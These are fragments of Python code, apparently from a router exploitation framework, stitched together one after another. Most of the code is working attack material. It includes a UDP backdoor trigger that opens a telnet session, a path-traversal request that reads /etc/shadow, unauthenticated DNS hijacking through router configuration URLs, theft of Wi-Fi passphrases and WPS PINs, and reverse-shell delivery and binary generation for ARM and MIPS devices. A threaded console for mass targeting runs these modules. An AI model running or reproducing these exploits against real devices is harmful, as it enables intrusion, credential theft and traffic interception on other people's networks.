def check(self, host, port, timeout): utils.print_info('Use username: {}, password: {}'.format(self.username, self.password)) if self.input_to_continue(): if self.login(host, port, timeout): url = self.check_url.format(host, port) resp, err = self.http_get(self.s, url, timeout) if err: self.print_requests_err(host, port, err) self.print_check_result(False, host) else: textarea_1_match = re.compile(r'textarea cols="" rows="" class="textarea_1"', re.S).search(resp.text) if textarea_1_match: self.print_check_result(True, host) return True else: utils.print_warning('Device is busy, please wait') return False else: utils.print_failed('Login failed') self.print_check_result(False, host) return False else: self.set_credits() return self.check(host, port, timeout) return False
def run(self, host, port, timeout): # TODO NOT TESTING if self.primary_dns == '': p_dns = input('Please input the PRIMARY DNS: ') if utils.valid_host(p_dns): self.primary_dns = p_dns else: self.run(host, port, timeout) if self.second_dns == '': s_dns = input('Please input the SECOND DNS: ') if utils.valid_host(s_dns): self.second_dns = s_dns else: self.run(host, port, timeout) utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format(self.primary_dns, self.second_dns)) if self.input_to_continue(): url = 'http://{}:{}/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}'\ .format(host, port, self.primary_dns, self.second_dns) resp, err = self.http_post(self.s, url, timeout, None) if err: self.print_requests_err(host, port, err) return if resp.status_code == 200: utils.print_success("DNS settings has been changed") else: utils.print_failed("Could not change DNS settings") else: self.primary_dns = '' self.second_dns = ''
def run(self, host, port, timeout): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(10.0) utils.print_info("Sending backdoor packet...") response = "" try: sock.sendto("HELODBG", (host, 39889)) response = sock.recv(1024) except Exception as e: pass sock.close() if "Hello" in response: utils.print_success("Target seems to vulnerable") utils.print_info( "Trying to connect to the telnet service {}:{}".format( host, 23)) try: tn = telnetlib.Telnet(host, 23) tn.interact() except Exception as e: utils.print_failed( "Exploit failed - could not connect to the telnet service") else: utils.print_failed( "Exploit failed - target seems to be not vulnerable")
def shell(exploit, architecture="", method="", **params): while 1: cmd = input("cmd > ") if cmd in ["quit", "exit"]: return c = cmd.split() if len(c) and c[0] == "reverse_tcp": if len(c) == 3: lhost = c[1] lport = c[2] revshell = ReverseShell(exploit, architecture, lhost, lport) if method == "wget": revshell.wget(binary=params['binary'], location=params['location']) elif method == "echo": revshell.echo(binary=params['binary'], location=params['location']) elif method == "awk": revshell.awk(binary=params['binary']) elif method == "netcat": revshell.netcat(binary=params['binary'], shell=params['shell']) else: print_failed("Reverse shell is not available") else: print_failed("reverse_tcp <reverse ip> <port>") else: print_info(exploit.execute(cmd))
def do_check(self, arg): utils.print_info('checking if module loaded') if not self.check_module_loaded(): utils.print_failed( 'checking module failed\n' 'Please make sure you have already choose one module') return utils.print_info('checking targets info') if not self.check_target_arg(): utils.print_failed('checking targets info failed\n' 'Please make sure you input info target info') return else: utils.print_success('passing checking...') target = self.task.get_current() if self.module.check(target.host, target.port, self.task.get_timeout()): module_name = inspect.getmodule(self.module).__name__[16:] exploits = target.affective_exploit if not exploits: a_exploit = [module_name] else: if module_name not in exploits: a_exploit = exploits.append(module_name) else: a_exploit = exploits self.task.set_current( ExploitTarget(host=target.host, port=target.port, brand=target.brand, alternative_exploit=target.alternative_exploit, affective_exploit=a_exploit))
def run(self, host, port, timeout): # TODO NOT TESTING if self.info is None: url = "http://{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase," \ "wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list," \ "get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode," \ "get_wps_enable,get_wps_current_time&_=1458458152703" \ .format(host, port) resp, err = self.http_get(self.s, url, timeout) if err is None: if resp.status_code == 200: try: self.info = json.loads(resp.text) except ValueError: pass if self.info and len(self.info): utils.print_success('Exploit success') t = prettytable.PrettyTable() t.add_column('Key', list(self.info.keys())) t.add_column('Value', list(self.info.values())) utils.print_info(t) utils.logger.send((host, port, t)) utils.print_failed('Exploit failed')
def run(self, host, port, timeout): filename = input('Please input filename(default: /etc/shadow): ') if filename == '': filename = '/etc/shadow' url = "{}:{}/cgi-bin/webproc".format(host, port) data = { "getpage": "html/index.html", "*errorpage*": "../../../../../../../../../../..{}".format(filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******", "%3Aaction": "login", "%3Asessionid": "abcdefgh" } # connection response, err = self.http_post(self.s, url, timeout, data) if err: self.print_requests_err(host, port, err) return if response.status_code == 200: utils.print_success("Exploit success") utils.print_info("File: {}".format(filename)) utils.print_info(response.text) else: utils.print_failed("Exploit failed")
def run(self, host, port, timeout): # TODO NOT TESTING if self.primary_dns == '': p_dns = input('Please input the PRIMARY DNS: ') if utils.valid_host(p_dns): self.primary_dns = p_dns else: self.run(host, port, timeout) if self.second_dns == '': s_dns = input('Please input the SECOND DNS: ') if utils.valid_host(s_dns): self.second_dns = s_dns else: self.run(host, port, timeout) utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format( self.primary_dns, self.second_dns)) if self.input_to_continue(): url = "http://{}:{}/ddnsmngr.cmd?action=apply&service=0&enbl=0&" \ "dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" \ .format(host, port, self.primary_dns, self.second_dns) resp, err = self.http_post(self.s, url, timeout, None) if err: self.print_requests_err(host, port, err) return if resp.status_code == 200: utils.print_success("DNS settings has been changed") else: utils.print_failed("Could not change DNS settings") else: self.primary_dns = '' self.second_dns = ''
def do_use(self, module_path, *arg): module_path = utils.pythonize_path(module_path) module_path = '.'.join(('modules', module_path, '__interpreter__')) try: utils.import_module(module_path, 'Interpreter')() except ModuleImportException as err: utils.print_failed(err)
def do_load(self, scanner_name): module_path = utils.pythonize_path(scanner_name) module_path = '.'.join(('modules.scanner', module_path)) try: self.module = utils.import_module(module_path, 'Scanner') except ModuleImportException as err: utils.print_failed(err) else: self.change_prompt(self.module)
def last(self, args): if len(self.__targets) == 0: utils.print_failed('no targets list') return if self.__current > 0: self.__current -= 1 utils.print_info( 'move to ' + utils.Color.GREEN + str(self.__current) + utils.Color.ENDC + ': ' + self.__targets[ self.__current].host) else: utils.print_failed('targets list move to the first')
def do_writeresult(self, *args): if self.task.get_output(): fd = open(self.task.get_output(), 'w') for result in self.last_result: utils.print_info("{}:{},{},{},{},{}".format( result.host, result.port, result.brand, result.module, result.extra, result.exploit), file=fd) fd.close() else: utils.print_failed('no output file given')
def run(self, host, port, timeout): # TODO This script works but the effect is poor utils.print_info('Use username: {}, password: {}'.format(self.username, self.password)) if self.input_to_continue(): if self.login(host, port, timeout): resp, err = self.http_get(self.s, self.check_url.format(host, port), timeout) if err: self.print_requests_err(host, port, err) else: self.command_loop(host, port, timeout) else: utils.print_failed('Login failed') else: self.set_credits() self.run()
def do_run(self, arg): utils.print_info('checking if module loaded') if not self.check_module_loaded(): utils.print_failed( 'checking module failed\n' 'Please make sure you have already choose one module') return utils.print_info('checking targets info') if not self.check_target_arg(): utils.print_failed('checking targets info failed\n' 'Please make sure you input info target info') return else: utils.print_success('passing checking...') target = self.task.get_current() self.module.run(target.host, target.port, self.task.get_timeout())
def generate_binary(self, lhost, lport): print_warning("Generating reverse shell binary") self.binary_name = random_text(8) ip = self.convert_ip(lhost) port = self.convert_port(lport) if self.arch == 'arm': self.revshell = self.arm[:0x104] + ip + self.arm[ 0x108:0x10a] + port + self.arm[0x10c:] elif self.arch == 'mipsel': self.revshell = self.mipsel[:0xe4] + port + self.mipsel[ 0xe6:0xf0] + ip[2:] + self.mipsel[ 0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:] elif self.arch == 'mips': self.revshell = self.mips[:0xea] + port + self.mips[ 0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[ 2:] + self.mips[0xf8:] else: print_failed("Platform not supported")
def do_run(self, arg): scan_result_queue.empty() self.last_result = [] utils.print_info('checking if module loaded') if not self.check_module_loaded(): utils.print_failed( 'checking module failed\n' 'Please make sure you have already choose one module') return utils.print_info('checking targets info') if not self.check_task_arg(): utils.print_failed('checking targets info failed\n' 'Please make sure you input info target info') return else: utils.print_success('passing checking...') with threads.ThreadPoolExecutor(self.task.get_threads()) as executor: for target in self.task.get_targets(): executor.submit(self.target_func, target) utils.print_success('all tasks finished...') while True: try: result = scan_result_queue.get(block=False) self.last_result.append(result) except Exception as e: print(e) break if self.task.get_output() != '': fd = open(self.task.get_output(), 'w') for result in self.last_result: utils.print_info("{}:{},{},{},{},{}".format( result.host, result.port, result.brand, result.module, result.extra, result.exploit), file=fd) fd.close()
def do_task(self, args): try: sub_opt, arg = args.split(' ')[0], args.split(' ')[1:] if sub_opt not in self.sub_opt['task']: raise BadHostInfoException() except IndexError: utils.print_failed( "Error during setting '{}'\n" "Not enough arguments\n" "Use <tab> key multiple times for completion.".format(args)) return except BadHostInfoException as err: utils.print_failed( "Error during setting '{}'\n" "Use <tab> key multiple times for completion.".format(args)) return try: self.task.__getattribute__(sub_opt)(arg) except (BadHostInfoException, TypeError) as err: utils.print_failed("Error during setting '{}'\n" "{}.\n" "Please check the arguments input.".format( sub_opt, err))
def default(self, line): utils.print_failed( '*** Unknown command: {command}'.format(command=line))